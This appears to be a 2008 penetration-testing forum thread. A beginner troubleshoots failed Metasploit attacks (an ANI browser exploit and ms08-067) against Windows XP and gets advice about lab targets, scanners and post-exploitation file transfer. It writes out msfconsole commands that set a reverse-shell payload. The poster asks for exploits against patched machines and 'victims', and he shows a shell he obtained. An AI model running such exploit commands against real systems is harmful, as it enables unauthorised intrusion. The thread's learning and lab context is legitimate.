.

problem with use MSF

<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Fri Nov 14, 2008 2:15 pm

problem with use MSF

I have some problem with use metasploit

i'm test more exploit but not sucss I'don't wht problem

look this example

use windows/browser/ani_loadimage_chunksize

set SRVHOST myip

set SRVPORT 8000

set URIPATH nono

set payload windows/shell_reverse_tcp

set LHOST ip victim

>exploit

[*] Started reverse handler[*] Using URL: http://ip:8000/nono[*] Server started.

after i'm test this on OS xp sp and IE 7 ,IE 6

after tell me [*] Sending HTML page to ip:6668...[*] Sending ANI file to ip:6668...

i'm wating but nothing happen

>> sessions -l

Active sessions===============No active sessions.

what problem >>>???

any idea?

and can any one give me some exploit working on xp sp2 and sp3
Last edited by mr.Z on Fri Nov 14, 2008 2:23 pm, edited 1 time in total.
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 14, 2008 2:45 pm

Re: problem with use MSF

Sounds like it's not vulnerable.
<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Fri Nov 14, 2008 2:58 pm

Re: problem with use MSF

thanx

but i'm show target

--  ---- 
0  (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

and i'm test on 7 pc's seam problem  ;D
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 14, 2008 4:29 pm

Re: problem with use MSF

Just because those are listed as targets, doesn't mean they're vulnerable... just what the exploit can attack.
<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Fri Nov 14, 2008 5:55 pm

Re: problem with use MSF

ok thanx

but can give me some name exploit working on win xp sp1,sp2,sp3,vista

and I want exploit use without send the url to victim

I'm using MSF under windows xp
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Fri Nov 14, 2008 11:09 pm

Re: problem with use MSF

mr.Z wrote:I'm using MSF under windows xp


There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.
<<

LSOChris

Post Fri Nov 14, 2008 11:26 pm

Re: problem with use MSF

ms08-067 exploit
<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Sun Nov 16, 2008 2:37 pm

Re: problem with use MSF

BillV wrote:
mr.Z wrote:I'm using MSF under windows xp


There's your first problem. Run it under Linux.

I can't tell you what exploit to use, it depends on what your target is vulnerable to. As you've already figured out how to do, you can see which exploits will work against which targets.


thanx alot  now i'm work in linux and update msf

----
ChrisG

thanx

I'm test this exploit but show me message problem

[*] Started bind handler
[-] Exploit failed: The connection timed out (ip-vicitm:4444).
[*] Exploit completed, but no session was created.

why this not work what  problem

but no session was created????

plz tell me
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Sun Nov 16, 2008 11:47 pm

Re: problem with use MSF

You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Mon Nov 17, 2008 10:25 am

Re: problem with use MSF

apollo wrote:You probably aren't vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.


You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

any more Idea?
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Mon Nov 17, 2008 1:37 pm

Re: problem with use MSF

mr.Z wrote:any more Idea?


Yes, I think you need to do more research and studying regarding exploits and how metasploit works.

I suggest you start here.

BillV
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Nov 17, 2008 6:06 pm

Re: problem with use MSF

I'll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

geekyone

User avatar

Full Member
Full Member

Posts: 180

Joined: Fri Oct 26, 2007 12:45 pm

Location: Peoria, IL

Post Mon Nov 17, 2008 9:05 pm

Re: problem with use MSF

mr.Z wrote:
You are correct but I want test on full patch windows xp
and I'm try much and i'm show if port 445 open then you can use ms08-067 expoit and if the windows xp full patch

any more Idea?


Your biggest problem is trying to exploit a fully patched windows xp box with metasploit.  If you want to learn more about metasploit and practice pen testing techniques don't attack a fully patched box in your lab. 

Metasploit doesn't have any zero day vulnerabilities included in it (currently) so you are never going to be able to successfully exploit a fully patched box with metasploit right now.  Now if you really want to exploit a fully patched xp box you should take Billv's suggestion to heart because that is going to involve getting into zero day vulnerability research.  Which requires an in depth understanding of how exploits work.  If you want to get into that I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition
CISSP, CEH, GPEN, GCIH, GCFA
<<

mr.Z

Newbie
Newbie

Posts: 12

Joined: Fri Nov 07, 2008 12:51 pm

Post Sat Nov 22, 2008 2:37 pm

Re: problem with use MSF

THANK YOU ALL

now i'm install windows xp witout servies pack

and exploit this windows

i'm use paylod
>"windows/shell_reverse_tcp"
>exploit
>Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

but I cant upload some file i'm using this msf under linux

test some command like this
>copy /root/xx.txt c:\

but not succss the error msg
>copy /root/xx.txt c:\
The syntax of the command is incorrect
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Sat Nov 22, 2008 2:47 pm

Re: problem with use MSF

If your getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP Server on your Linux box, when requesting the files using  tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp Payload and use the upload from there, it's quicker. The meterpreter also has alot of other useful options as well.
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
Next

Return to Tutorials

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software